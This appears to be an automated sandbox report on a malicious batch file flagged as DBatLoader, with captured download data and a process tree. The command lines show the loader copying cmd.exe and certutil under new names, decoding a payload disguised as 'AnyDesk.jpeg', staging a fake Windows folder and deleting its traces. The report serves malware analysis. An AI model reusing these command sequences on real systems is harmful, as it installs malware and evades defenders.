                                                                                                X-GUploader-UploadID: AFiumC7PKzFG6Nx6_YMMATmGWDXVt1GEZrI7SJOIgfsn2Bm-frfzo7Wcpth--poSDHq6_ZgupfJwJLWVZg
                                                                                                Date: Sat, 30 Nov 2024 20:20:06 GMT
                                                                                                Expires: Sat, 30 Nov 2024 20:20:06 GMT
                                                                                                Cache-Control: private, max-age=0
                                                                                                X-Goog-Hash: crc32c=8Zc5gQ==
                                                                                                Server: UploadServer
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close
                                                                                                2024-11-30 20:20:06 UTC4918INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 68 4a 77 38 56 48 68 38 6a 4a 42 45 61 45 68 67 6c 45 51 34 50 4a 42 38 57 45 52 59 6a 45 51 38 64 49 78 49 59 47 68 55 66 47 69 51 6c 44 78 45 64 45 67 34 53 45 43 63 65 4a 69 55 4f 49 78 30 64 44 68 38 61 44 69 51 61 4a 69 55 65 45 77 38 69 45 69 63 69 48 53 45 52 45 68 6b 56 4a 52 49 55 48 43 45 56 4a 53 49 4f 45 53 49 5a 45 52 34 65 45 43 55 61 70 71 36 6c 57 53 4f 6e 73 55 76 39 49 69 59 57 44 68 59 63 44 79 59 58 47 4b 61 75 70 56 6b 6a 70 37 46 4c 7a 4e 72 43 79 4e 48 53 7a 73 2b 38 78 62 33 4c 32 4c 7a 42 77 73 2f 53 79 62 7a 4a 7a 72 7a 43 30 4d 36 39 79 38 58 49 30 73 58 50 32 4d 4b 38 30 4c 33 42 76 63 50 61 30 64 6e 59 77 63 37 51 30 4d 48 53 78 63 48 50 78 64 6e 59 30 62 37 43 7a 62 33 61 7a 64 44 4d 76 4c 33
                                                                                                Data Ascii: pq6lWSOnsUshJw8VHh8jJBEaEhglEQ4PJB8WERYjEQ8dIxIYGhUfGiQlDxEdEg4SECceJiUOIx0dDh8aDiQaJiUeEw8iEiciHSEREhkVJRIUHCEVJSIOESIZER4eECUapq6lWSOnsUv9IiYWDhYcDyYXGKaupVkjp7FLzNrCyNHSzs+8xb3L2LzBws/SybzJzrzC0M69y8XI0sXP2MK80L3BvcPa0dnYwc7Q0MHSxcHPxdnY0b7Czb3azdDMvL3
                                                                                                2024-11-30 20:20:06 UTC4861INData Raw: 66 53 68 65 47 6d 43 42 2f 4f 5a 73 47 78 78 77 76 48 39 46 6f 33 6a 30 35 79 4e 75 6b 4f 38 37 33 32 75 47 50 6c 7a 61 74 39 73 42 41 48 74 4c 4d 34 4a 61 59 51 32 4b 69 47 53 35 62 58 4d 33 4d 2b 52 46 39 6c 4b 39 66 49 49 69 38 54 66 67 47 66 71 34 37 35 72 55 59 68 6a 30 65 44 6a 52 75 4c 64 6f 2b 7a 6d 43 66 6e 43 31 46 7a 38 6d 63 46 56 69 38 6b 49 47 58 59 6d 71 6b 7a 63 56 64 63 61 56 35 4a 46 46 44 6d 56 34 79 47 56 61 37 2b 73 73 73 4c 41 71 47 53 67 45 53 52 2b 64 37 72 55 6d 4d 79 37 39 6f 4d 63 31 45 78 66 4e 37 71 63 6f 46 38 79 6f 74 64 47 35 74 6b 34 31 42 31 72 30 6a 5a 30 6e 4e 64 4a 32 64 55 6e 44 66 79 51 48 58 7a 34 5a 2b 4f 41 31 30 50 76 33 61 49 30 45 45 56 4b 51 75 74 50 51 68 68 5a 4f 5a 39 4a 64 63 37 5a 35 43 69 36 62 34 4d 41
                                                                                                Data Ascii: fSheGmCB/OZsGxxwvH9Fo3j05yNukO8732uGPlzat9sBAHtLM4JaYQ2KiGS5bXM3M+RF9lK9fIIi8TfgGfq475rUYhj0eDjRuLdo+zmCfnC1Fz8mcFVi8kIGXYmqkzcVdcaV5JFFDmV4yGVa7+sssLAqGSgESR+d7rUmMy79oMc1ExfN7qcoF8yotdG5tk41B1r0jZ0nNdJ2dUnDfyQHXz4Z+OA10Pv3aI0EEVKQutPQhhZOZ9Jdc7Z5Ci6b4MA
                                                                                                2024-11-30 20:20:06 UTC1323INData Raw: 78 75 6c 4f 53 53 30 4a 33 6e 59 5a 58 35 53 56 32 56 35 6c 34 2b 59 58 36 31 46 39 6c 49 71 50 7a 35 76 62 42 77 65 73 57 56 4c 74 77 47 30 35 6b 39 4a 45 68 43 4c 46 45 2b 48 64 32 57 47 63 4f 45 55 44 6d 73 79 35 34 55 6c 57 4a 64 38 56 46 43 4b 71 31 32 42 6b 51 53 75 6d 39 43 69 54 57 30 2f 53 6e 54 39 59 78 4f 39 6a 61 75 36 2f 47 56 33 54 6b 4e 46 47 2b 46 41 63 56 6d 2b 76 76 7a 44 56 47 31 2f 49 31 59 76 78 78 57 7a 65 62 30 36 43 46 6a 46 4f 75 64 68 2b 65 36 35 72 6c 4f 36 48 65 53 54 6f 31 37 2f 36 62 6b 47 6b 5a 54 6c 39 4d 6e 6f 78 54 55 69 5a 50 6c 76 31 50 59 56 49 35 6b 39 74 49 6a 52 31 6f 71 34 2f 78 38 56 74 69 6a 78 2b 65 68 64 6c 62 53 46 2f 74 38 2b 7a 69 77 50 4e 31 5a 64 34 52 4e 53 39 5a 4f 53 53 6f 51 6c 30 47 51 35 39 66 74 32
                                                                                                Data Ascii: xulOSS0J3nYZX5SV2V5l4+YX61F9lIqPz5vbBwesWVLtwG05k9JEhCLFE+Hd2WGcOEUDmsy54UlWJd8VFCKq12BkQSum9CiTW0/SnT9YxO9jau6/GV3TkNFG+FAcVm+vvzDVG1/I1YvxxWzeb06CFjFOudh+e65rlO6HeSTo17/6bkGkZTl9MnoxTUiZPlv1PYVI5k9tIjR1oq4/x8Vtijx+ehdlbSF/t8+ziwPN1Zd4RNS9ZOSSoQl0GQ59ft2
                                                                                                2024-11-30 20:20:06 UTC1390INData Raw: 35 39 65 73 54 43 59 58 6a 79 51 57 42 68 61 46 71 43 57 4d 6c 47 30 5a 53 57 34 33 54 66 43 76 50 6c 65 6e 6d 4c 33 30 72 4d 56 2b 73 57 76 54 64 6f 6f 49 65 50 65 2b 61 58 52 2b 41 6d 4b 56 6e 75 39 42 75 43 67 6d 67 54 49 45 6a 4c 47 65 52 79 49 6e 6b 47 58 30 6d 64 30 6c 5a 64 4e 68 7a 44 65 70 6a 55 4d 46 69 35 53 65 59 76 5a 77 43 54 63 54 41 37 6e 4d 2b 47 33 34 6c 6a 50 49 6c 4a 35 30 43 4a 48 62 67 6e 62 72 76 2f 62 50 6f 4d 79 55 73 43 53 49 2b 6b 4d 37 38 51 45 49 7a 67 46 61 4b 78 5a 74 37 67 36 4b 65 39 66 58 35 44 72 77 4b 58 72 7a 4f 78 63 38 2f 53 62 37 53 64 78 4b 72 4c 79 4f 58 64 56 45 32 4f 71 6e 63 5a 6f 4a 53 4a 75 52 78 74 37 41 64 4e 64 78 61 45 6d 66 32 4e 78 59 47 4d 31 67 43 4f 41 6a 4e 4d 72 75 37 49 74 42 5a 43 4e 38 44 69 35
                                                                                                Data Ascii: 59esTCYXjyQWBhaFqCWMlG0ZSW43TfCvPlenmL30rMV+sWvTdooIePe+aXR+AmKVnu9BuCgmgTIEjLGeRyInkGX0md0lZdNhzDepjUMFi5SeYvZwCTcTA7nM+G34ljPIlJ50CJHbgnbrv/bPoMyUsCSI+kM78QEIzgFaKxZt7g6Ke9fX5DrwKXrzOxc8/Sb7SdxKrLyOXdVE2OqncZoJSJuRxt7AdNdxaEmf2NxYGM1gCOAjNMru7ItBZCN8Di5
                                                                                                2024-11-30 20:20:06 UTC1390INData Raw: 43 74 6b 4b 47 70 72 78 79 31 30 64 63 38 76 46 56 69 6e 41 62 64 4e 77 2f 71 4a 58 68 47 75 49 50 77 2f 67 46 58 47 79 59 48 52 77 44 75 71 6b 78 38 49 44 73 6a 6e 63 57 6c 37 74 30 79 59 35 55 7a 32 52 2b 54 71 59 6d 57 31 64 6a 30 32 66 30 43 62 47 4a 35 4b 73 6d 38 6b 45 53 46 50 51 69 67 69 39 41 69 4d 6c 75 49 34 4e 74 34 6a 35 4f 4f 41 6a 6e 36 63 48 2b 59 66 57 50 4f 45 57 35 79 67 63 44 56 4c 65 6e 31 55 6d 51 74 57 6b 67 4e 41 52 55 46 51 36 6d 47 31 51 77 34 75 38 63 52 6a 4a 4d 45 70 51 78 31 6b 35 4a 38 30 34 53 62 44 71 48 46 52 65 47 5a 67 6e 56 76 75 79 44 46 6c 2b 4d 77 7a 5a 66 36 4c 2f 72 64 66 39 70 30 63 4f 73 47 55 44 46 38 55 6c 44 56 50 43 78 4b 78 52 48 53 6c 37 54 73 58 50 57 46 58 4c 63 38 43 6a 50 54 30 53 31 61 32 2b 78 4c 6c
                                                                                                Data Ascii: CtkKGprxy10dc8vFVinAbdNw/qJXhGuIPw/gFXGyYHRwDuqkx8IDsjncWl7t0yY5Uz2R+TqYmW1dj02f0CbGJ5Ksm8kESFPQigi9AiMluI4Nt4j5OOAjn6cH+YfWPOEW5ygcDVLen1UmQtWkgNARUFQ6mG1Qw4u8cRjJMEpQx1k5J804SbDqHFReGZgnVvuyDFl+MwzZf6L/rdf9p0cOsGUDF8UlDVPCxKxRHSl7TsXPWFXLc8CjPT0S1a2+xLl
                                                                                                2024-11-30 20:20:06 UTC1390INData Raw: 69 7a 76 45 6e 30 49 63 4c 61 57 71 73 53 37 52 44 4b 46 2f 2f 53 31 6b 54 66 7a 5a 57 31 70 2f 56 39 73 4e 69 47 4d 4a 4a 58 5a 4a 66 67 65 76 48 51 56 52 75 61 77 58 6a 41 38 53 30 72 54 5a 62 70 70 33 39 73 53 66 68 6e 31 6d 78 4f 2f 38 52 56 31 47 6a 51 33 71 75 4e 43 41 52 2b 62 4a 51 31 2b 50 47 64 79 59 6e 45 70 46 63 30 44 49 79 6b 36 6e 4b 47 4e 66 79 6f 38 32 72 72 4b 52 78 41 4f 33 39 6b 42 76 4d 74 6f 48 79 48 7a 56 61 61 79 45 70 31 5a 4b 62 4c 51 7a 34 33 4c 2f 63 75 49 74 47 4e 65 56 47 37 6a 64 67 6d 6a 36 6b 34 50 33 77 4a 73 43 34 69 6f 45 33 4a 34 31 7a 6f 31 4f 33 5a 41 63 54 50 65 53 57 73 46 49 37 4e 48 71 42 38 51 4a 41 56 64 38 4d 32 69 64 41 65 48 4a 63 39 56 50 62 6c 78 74 35 70 75 64 77 45 70 6f 32 48 31 39 76 58 77 44 59 79 48
                                                                                                Data Ascii: izvEn0IcLaWqsS7RDKF//S1kTfzZW1p/V9sNiGMJJXZJfgevHQVRuawXjA8S0rTZbpp39sSfhn1mxO/8RV1GjQ3quNCAR+bJQ1+PGdyYnEpFc0DIyk6nKGNfyo82rrKRxAO39kBvMtoHyHzVaayEp1ZKbLQz43L/cuItGNeVG7jdgmj6k4P3wJsC4ioE3J41zo1O3ZAcTPeSWsFI7NHqB8QJAVd8M2idAeHJc9VPblxt5pudwEpo2H19vXwDYyH
                                                                                                2024-11-30 20:20:06 UTC1390INData Raw: 45 35 76 30 42 77 49 44 63 43 4f 72 55 4e 34 73 71 50 77 55 6d 2f 76 58 30 35 71 54 67 58 6d 50 62 4f 72 69 58 65 2f 59 46 32 6e 6b 6a 41 4e 6d 4d 64 61 69 63 77 62 47 4c 4c 41 61 6a 32 47 48 2b 46 63 2f 46 6b 52 45 2f 72 33 2b 6e 66 53 68 6a 6a 5a 4e 7a 62 54 4a 32 74 5a 76 45 52 30 58 57 45 53 48 74 38 34 46 7a 76 39 48 45 59 77 59 76 6d 31 7a 6e 66 7a 35 5a 6d 6a 5a 47 57 57 2f 35 61 62 30 4b 68 39 4e 34 71 56 34 74 72 76 70 54 57 37 65 58 6d 33 4b 46 43 4f 71 6b 50 6f 2f 62 45 65 43 6b 41 47 52 62 39 6a 59 6e 35 6c 37 4b 36 2f 39 66 2b 72 6e 53 4a 43 56 44 38 34 33 6b 55 34 69 68 4d 6c 4c 4e 73 2f 67 45 75 6b 54 2b 66 79 6d 52 69 62 4e 57 46 4e 69 4c 35 42 72 4a 6b 4c 39 65 2b 2b 44 47 31 6c 54 76 70 2f 42 51 56 37 5a 4e 64 49 6a 2f 4c 77 4e 70 66 49
                                                                                                Data Ascii: E5v0BwIDcCOrUN4sqPwUm/vX05qTgXmPbOriXe/YF2nkjANmMdaicwbGLLAaj2GH+Fc/FkRE/r3+nfShjjZNzbTJ2tZvER0XWESHt84Fzv9HEYwYvm1znfz5ZmjZGWW/5ab0Kh9N4qV4trvpTW7eXm3KFCOqkPo/bEeCkAGRb9jYn5l7K6/9f+rnSJCVD843kU4ihMlLNs/gEukT+fymRibNWFNiL5BrJkL9e++DG1lTvp/BQV7ZNdIj/LwNpfI
                                                                                                2024-11-30 20:20:06 UTC1390INData Raw: 38 46 78 35 65 36 78 71 59 6a 2b 35 58 50 39 35 49 36 2f 68 46 64 68 58 6a 69 70 6f 2b 77 70 73 4b 43 6e 53 68 31 62 55 79 38 7a 2f 6f 31 79 50 41 6a 6f 4d 45 4c 2b 68 31 74 74 61 53 2f 34 30 77 33 6c 70 6a 4e 45 69 62 39 64 4e 73 6e 5a 38 55 61 6b 71 62 39 53 67 74 39 49 78 62 66 59 74 2b 77 77 4e 72 2f 2b 2b 63 59 6f 4d 4c 54 33 7a 61 36 50 59 32 35 71 35 34 31 64 2f 44 6b 56 50 76 42 6c 77 57 4f 32 59 52 36 55 50 76 6a 78 74 41 4f 5a 6f 6f 4c 75 69 36 47 50 4c 72 4b 64 69 65 6f 37 77 6f 42 54 70 31 42 79 35 45 34 6b 54 51 76 41 39 6c 74 39 53 4a 2f 6d 46 65 75 4f 6c 6a 2b 7a 66 79 31 30 75 34 52 38 55 58 41 77 4d 56 53 50 62 55 66 46 4b 75 74 5a 4c 32 4f 38 6b 53 4f 66 6b 51 4d 2f 69 70 61 2b 6f 54 6f 7a 6a 47 30 59 4c 54 53 6e 51 44 68 52 52 46 6c 6b
                                                                                                Data Ascii: 8Fx5e6xqYj+5XP95I6/hFdhXjipo+wpsKCnSh1bUy8z/o1yPAjoMEL+h1ttaS/40w3lpjNEib9dNsnZ8Uakqb9Sgt9IxbfYt+wwNr/++cYoMLT3za6PY25q541d/DkVPvBlwWO2YR6UPvjxtAOZooLui6GPLrKdieo7woBTp1By5E4kTQvA9lt9SJ/mFeuOlj+zfy10u4R8UXAwMVSPbUfFKutZL2O8kSOfkQM/ipa+oTozjG0YLTSnQDhRRFlk
                                                                                                2024-11-30 20:20:06 UTC1390INData Raw: 46 4b 63 64 34 51 30 4b 77 38 4c 38 73 4e 64 46 4e 6c 78 61 38 7a 78 5a 69 4a 57 43 65 6c 69 45 4f 33 35 64 57 39 77 4e 36 72 68 65 64 52 31 70 61 7a 6e 53 2f 75 6d 74 59 76 67 75 74 43 6a 6f 44 72 41 65 5a 36 79 66 44 59 50 76 75 53 69 4b 47 6f 77 34 35 43 4c 46 30 75 68 36 5a 7a 72 58 71 4d 64 79 4e 75 76 63 51 38 59 32 2b 31 71 32 4e 63 35 63 58 47 2b 34 71 45 37 5a 4a 55 74 37 71 50 70 6d 4e 48 2f 75 39 65 4c 63 6a 68 77 42 36 67 2b 35 52 67 63 31 6a 4d 4a 72 55 68 49 76 37 78 45 62 30 57 6f 79 47 7a 65 4e 44 68 45 56 7a 71 67 5a 33 35 4d 6d 41 33 37 42 31 63 55 41 59 6e 52 38 53 47 56 2b 30 63 44 53 6c 46 33 7a 4c 5a 51 71 76 48 49 4c 6a 30 66 4b 45 6c 37 6d 67 66 74 76 4a 77 77 57 54 59 52 48 6f 64 79 50 51 58 45 69 53 6a 56 71 6a 6d 55 71 6c 30 30
                                                                                                Data Ascii: FKcd4Q0Kw8L8sNdFNlxa8zxZiJWCeliEO35dW9wN6rhedR1paznS/umtYvgutCjoDrAeZ6yfDYPvuSiKGow45CLF0uh6ZzrXqMdyNuvcQ8Y2+1q2Nc5cXG+4qE7ZJUt7qPpmNH/u9eLcjhwB6g+5Rgc1jMJrUhIv7xEb0WoyGzeNDhEVzqgZ35MmA37B1cUAYnR8SGV+0cDSlF3zLZQqvHILj0fKEl7mgftvJwwWTYRHodyPQXEiSjVqjmUql00
                                                                                                2024-11-30 20:20:06 UTC1390INData Raw: 45 4f 36 52 46 73 73 78 7a 34 56 76 4b 69 34 57 4a 52 43 71 45 33 49 64 61 42 6e 78 77 43 5a 66 64 62 30 55 41 6f 6b 53 5a 30 36 35 4d 4f 57 4d 53 78 6e 71 70 4e 76 74 63 55 49 5a 39 31 39 79 76 52 4e 76 41 58 50 76 63 35 36 65 4a 73 7a 63 6f 72 70 59 31 42 42 39 72 2f 68 6d 47 42 56 6a 43 69 71 56 52 31 59 54 33 37 63 50 72 30 2b 45 6e 4f 4d 49 53 71 52 59 55 71 54 65 66 7a 2f 50 5a 55 57 6d 4a 76 6d 6d 35 6a 41 48 71 57 71 4b 36 6f 66 54 50 30 62 64 53 58 6d 6c 47 63 6b 71 72 45 67 6f 4f 48 34 66 59 6b 2f 46 77 53 32 49 4d 4c 4f 39 63 7a 67 46 4e 41 38 68 39 49 34 59 37 35 36 57 47 4d 57 58 75 74 36 45 48 54 76 53 33 53 45 47 47 59 4c 4d 46 6f 77 39 62 6e 61 4a 56 4e 39 33 6c 2f 5a 41 76 37 2b 69 57 6d 35 47 5a 45 6b 7a 69 45 43 72 7a 78 63 42 53 5a 65
                                                                                                Data Ascii: EO6RFssxz4VvKi4WJRCqE3IdaBnxwCZfdb0UAokSZ065MOWMSxnqpNvtcUIZ919yvRNvAXPvc56eJszcorpY1BB9r/hmGBVjCiqVR1YT37cPr0+EnOMISqRYUqTefz/PZUWmJvmm5jAHqWqK6ofTP0bdSXmlGckqrEgoOH4fYk/FwS2IMLO9czgFNA8h9I4Y756WGMWXut6EHTvS3SEGGYLMFow9bnaJVN93l/ZAv7+iWm5GZEkziECrzxcBSZe


                                                                                                Click to jump to process

                                                                                                Click to jump to process

                                                                                                Click to dive into process behavior distribution

                                                                                                Click to jump to process

                                                                                                Target ID:0
                                                                                                Start time:15:19:54
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\saw.bat" "
                                                                                                Imagebase:0x7ff6f1bf0000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:1
                                                                                                Start time:15:19:54
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:2
                                                                                                Start time:15:19:55
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Windows\System32\extrac32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                                                                                                Imagebase:0x7ff79aab0000
                                                                                                File size:35'328 bytes
                                                                                                MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Target ID:3
                                                                                                Start time:15:19:55
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Users\Public\alpha.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                Imagebase:0x7ff7823d0000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Antivirus matches:
                                                                                                • Detection: 0%, ReversingLabs
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:4
                                                                                                Start time:15:19:55
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Windows\System32\extrac32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                Imagebase:0x7ff79aab0000
                                                                                                File size:35'328 bytes
                                                                                                MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Target ID:5
                                                                                                Start time:15:19:55
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Users\Public\alpha.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                                                                                                Imagebase:0x7ff7823d0000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:6
                                                                                                Start time:15:19:55
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Users\Public\kn.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                                                                                                Imagebase:0x7ff6a29c0000
                                                                                                File size:1'651'712 bytes
                                                                                                MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Antivirus matches:
                                                                                                • Detection: 0%, ReversingLabs
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Target ID:7
                                                                                                Start time:15:19:56
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Users\Public\alpha.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                                                                                                Imagebase:0x7ff7823d0000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:8
                                                                                                Start time:15:19:56
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Users\Public\kn.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                                                                                                Imagebase:0x7ff6a29c0000
                                                                                                File size:1'651'712 bytes
                                                                                                MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Target ID:9
                                                                                                Start time:15:19:57
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                Imagebase:0x400000
                                                                                                File size:1'058'816 bytes
                                                                                                MD5 hash:35811E8D8969BEF5354C7C3E6DBEFB27
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:Borland Delphi
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000009.00000003.1698319869.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 24%, ReversingLabs
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:10
                                                                                                Start time:15:19:57
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Users\Public\alpha.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                                                                                                Imagebase:0x7ff7823d0000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:11
                                                                                                Start time:15:19:57
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Users\Public\alpha.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
                                                                                                Imagebase:0x7ff7823d0000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:12
                                                                                                Start time:15:20:09
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\boiaiyuP.cmd" "
                                                                                                Imagebase:0x240000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:13
                                                                                                Start time:15:20:09
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:14
                                                                                                Start time:15:20:09
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                                Imagebase:0xa60000
                                                                                                File size:352'768 bytes
                                                                                                MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:15
                                                                                                Start time:15:20:09
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                                                Imagebase:0xa60000
                                                                                                File size:352'768 bytes
                                                                                                MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:16
                                                                                                Start time:15:20:10
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Users\Public\alpha.pif
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                                                                                                Imagebase:0x850000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Antivirus matches:
                                                                                                • Detection: 0%, ReversingLabs
                                                                                                Has exited:true

                                                                                                Target ID:17
                                                                                                Start time:15:20:10
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Puyiaiob.PIF /o
                                                                                                Imagebase:0xa60000
                                                                                                File size:352'768 bytes
                                                                                                MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:18
                                                                                                Start time:15:20:10
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
